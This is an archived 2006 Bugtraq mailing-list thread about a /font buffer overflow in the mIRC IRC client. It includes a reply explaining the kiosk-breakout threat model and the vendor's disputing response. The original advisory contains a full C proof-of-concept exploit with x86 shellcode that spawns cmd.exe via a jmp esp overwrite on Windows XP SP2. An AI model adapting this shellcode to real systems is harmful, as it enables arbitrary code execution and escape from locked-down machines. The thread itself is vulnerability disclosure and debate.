<<< Date Index >>>     <<< Thread Index >>>

Re: Buffer Overflow /Font on mIRC



As quite some confusion has arisen as to how exactly this and the previous finding [1] are security vulnerabilities, allow me to explain the issue in a little more detail. The main point is that these are attacks of local users against a locked-down (kiosk) system where the users can only run mIRC and no other programs.

In order for these vulnerabilities to have any significance, the following requirements would have to be met for an attacker on a system, at a minimum:

* The attacker is able to run mIRC, or it has been started for him already;
* The built-in /run, /dll and /com commands are password-locked in the mIRC options;
* The mIRC directory, and mIRC's root (current) directory, are read-only;
* The attacker is _not_ able to start arbitrary programs on his user account.

The result of using this exploit is then:

* The attacker is able to start arbitrary programs on his user account.

I.e. if you restrict a local user's abilities, and then set up and consider mIRC to be a sandboxed environment for him, the local user can break out of that sandboxed environment using this exploit. As indicated by the poster in his first mail, environments at risk from this would typically be cybercafes, where clients are only able to run (e.g.) a locked-down browser and mIRC, and nothing else. The 'victim' of the exploitation would then be the owner of the cybercafe.

Although the reported bugs can indeed be called security vulnerabilities in such environments, it's somewhat of a stretch, given that mIRC doesn't actually claim to be a complete sandbox, and already allows the user to e.g. create/overwrite any writable file and make arbitrary socket connections anyway. And fortunately, only a relatively small number of people are affected by this vulnerability at all - certainly not any end-user. Either way, these are bugs, and should of course be fixed.

Note that as the targeted environment obviously doesn't allow the user to run a compiled exploit, actual exploitation would require that the shellcode be constructed in mIRC's scripting language. It's rather easy to do that, though.

Kind regards,
David van Moolenbroek

[1] http://www.securityfocus.com/archive/1/420000

----- Original Message ----- From: "Krpata, Tyler" <tkrpata@xxxxxxx>
To: "Crowdat Kurobudetsu" <crowdat@xxxxxxxxx>; <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Friday, January 27, 2006 12:36 AM
Subject: RE: Buffer Overflow /Font on mIRC


I'm not following your English...are you saying you believe that this IS
or is NOT an exploitable bug?

-----Original Message-----
From: Crowdat Kurobudetsu [mailto:crowdat@xxxxxxxxx]
Sent: Tuesday, January 24, 2006 6:24 AM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Buffer Overflow /Font on mIRC

- 1 - Introduction

Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is well
equipped with options and tools.

- 2 - Vulnerability description

This bug was discovered by a friend (Racy) , with the command exposed by
Racy only hung mIRC, but after debugging and

testing, I discover that allow code execution.
Racy use this command /font -z $readini(c:\a\a.ini,aaaaaaa ,aaaa)
$readini(c:\a\a.ini,aaaaaaa ,aaaa) , in both cases return

null and crash, if the first parameter it's null and the second a long
string can overwrite the EIP and execute code, with

user privileges, DON'T ELEVATE PRIVILEGES.


- 3 - How to exploit it

This PoC open a cmd.exe,also it's possible execute any other code.

----------- CUT HERE ----------------------
/*
mircfontexploitXPSP2.c

This PoC it's for XP SP2 English
Special thanks to Racy from irc-hispano
*/


#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main () {
HWND lHandle;
char command[512]= "/font -z $null";
char strClass[30];
char buffer[128]=
"\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

char shellcode[999]=
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\xc7\x93\xc2\x77"
"\xFF\xD3";

//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 0x77c293c7
(WinXP Sp2 English)

char saltaoffset[]="\xD6\xD1\xE5\x77"; // jmp esp 0x77E5D1D6
(advapi32.dll)

SetForegroundWindow(lHandle);
lHandle = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit

", 0);

if (!lHandle) { printf("Can't find mIRC\n"); return 0; }

strcat(buffer,saltaoffset);
strcat(buffer,shellcode);
strcat(command,buffer);
printf("mIRC Font Command Exploit: %s\n", command);

SendMessage(lHandle, WM_SETTEXT,0,(LPARAM)command); SendMessage
(lHandle, WM_IME_KEYDOWN, VK_RETURN, 0); }

----------- CUT HERE ----------------------


- 4 - Solution

Khaled contacted with me about the latest advisory, he says don't have
any bug, any vulnerability.
This is the solution of Khaled:
"as far as I can tell, this is neither an exploit nor a vulnerability.
The above report describes a local bug in mIRC. The

author of the report indicates that any malicious software on your
computer can modify your mIRC settings to cause mIRC to

crash. But if you have malicious software on your computer, you've
already compromised your security..."

I post a response in the messageboard in mIRC forum, telling that a
exploit isn't a malicious software alone, isn't a trojan

or virus, and if a application it's secure, it's impossibly to execute
any code, the user don't compromise the machine if

download a exploit, the machine it's compromised if the program it's
vulnerable to the exploit, but Khaled delete it and

close the thread.

More info:
http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Number=146129&;
an=0&page=0#146129

- 5 - Credits

URL Vendor: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 24/01/2006

Racy post on messageboard:
http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Board=bugrepor
ts&Number=118751
Spanish Advisory and Compiled Spanish Exploit:
http://cyruxnet.org/archivo.php?20060121.00